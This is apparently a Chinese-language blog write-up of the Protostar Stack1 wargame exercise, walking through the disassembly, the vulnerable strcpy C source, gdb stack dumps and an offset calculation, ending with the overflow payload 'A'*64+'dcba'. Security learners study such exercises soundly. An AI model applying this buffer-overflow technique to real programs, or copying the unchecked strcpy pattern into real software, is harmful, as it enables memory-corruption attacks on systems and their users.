[exploit-exercises.com]Protostar Stack1 解答

assembler code:
0x08048464 <main+0>:    push   ebp
0x08048465 <main+1>:    mov    ebp,esp
0x08048467 <main+3>:    and    esp,0xfffffff0
0x0804846a <main+6>:    sub    esp,0x60
0x0804846d <main+9>:    cmp    DWORD PTR [ebp+0x8],0x1
0x08048471 <main+13>:   jne    0x8048487 <main+35>
0x08048473 <main+15>:   mov    DWORD PTR [esp+0x4],0x80485a0
0x0804847b <main+23>:   mov    DWORD PTR [esp],0x1
0x08048482 <main+30>:   call   0x8048388 <errx@plt>
0x08048487 <main+35>:   mov    DWORD PTR [esp+0x5c],0x0
0x0804848f <main+43>:   mov    eax,DWORD PTR [ebp+0xc]
0x08048492 <main+46>:   add    eax,0x4
0x08048495 <main+49>:   mov    eax,DWORD PTR [eax]
0x08048497 <main+51>:   mov    DWORD PTR [esp+0x4],eax
0x0804849b <main+55>:   lea    eax,[esp+0x1c]
0x0804849f <main+59>:   mov    DWORD PTR [esp],eax
0x080484a2 <main+62>:   call   0x8048368 <strcpy@plt>
0x080484a7 <main+67>:   mov    eax,DWORD PTR [esp+0x5c]
0x080484ab <main+71>:   cmp    eax,0x61626364
0x080484b0 <main+76>:   jne    0x80484c0 <main+92>
0x080484b2 <main+78>:   mov    DWORD PTR [esp],0x80485bc
0x080484b9 <main+85>:   call   0x8048398 <puts@plt>
0x080484be <main+90>:   jmp    0x80484d5 <main+113>
0x080484c0 <main+92>:   mov    edx,DWORD PTR [esp+0x5c]
0x080484c4 <main+96>:   mov    eax,0x80485f3
0x080484c9 <main+101>:  mov    DWORD PTR [esp+0x4],edx
0x080484cd <main+105>:  mov    DWORD PTR [esp],eax
0x080484d0 <main+108>:  call   0x8048378 <printf@plt>
0x080484d5 <main+113>:  leave
0x080484d6 <main+114>:  ret

c code:
#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argument\n"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right value\n"); } else { printf("Try again, you got 0x%08x\n", modified); } }

只要讓modified == 0x61626364就算通過 我們知道strcpy即使已經超過buffer大小還是會覆蓋過去
注意<main+67> & <main+71> 可以發現要覆蓋的地方是esp+0x5c
看一下esp

(gdb) break *0x080484a7
(gdb) x/24wx $esp
0xbffff750:     0xbffff76c      0xbffff997      0xb7fff8f8      0xb7f0186e
0xbffff760:     0xb7fd7ff4      0xb7ec6165      0xbffff778      0x41414141
0xbffff770:     0x41414141      0x41414141      0xbfff0041      0x08048334
0xbffff780:     0xb7ff1040      0x080496fc      0xbffff7b8      0x08048509
0xbffff790:     0xb7fd8304      0xb7fd7ff4      0x080484f0      0xbffff7b8
0xbffff7a0:     0xb7ec6365      0xb7ff1040      0x080484fb      0x00000000
(gdb) info register eax 0xbffff76c -1073744020 ecx 0x0 0 edx 0xe 14 ebx 0xb7fd7ff4 -1208123404 esp 0xbffff750 0xbffff750 ebp 0xbffff7b8 0xbffff7b8

所以要覆蓋的地址是esp+0x5c = 0xbffff7ac
0xbffff7ac-0xbffff76c=0x40=64 所以64個字元+0x61626364轉ascii='dcba'
payload = 'A'*64+'dcba'

留言

這個網誌中的熱門文章

[android]QR code掃描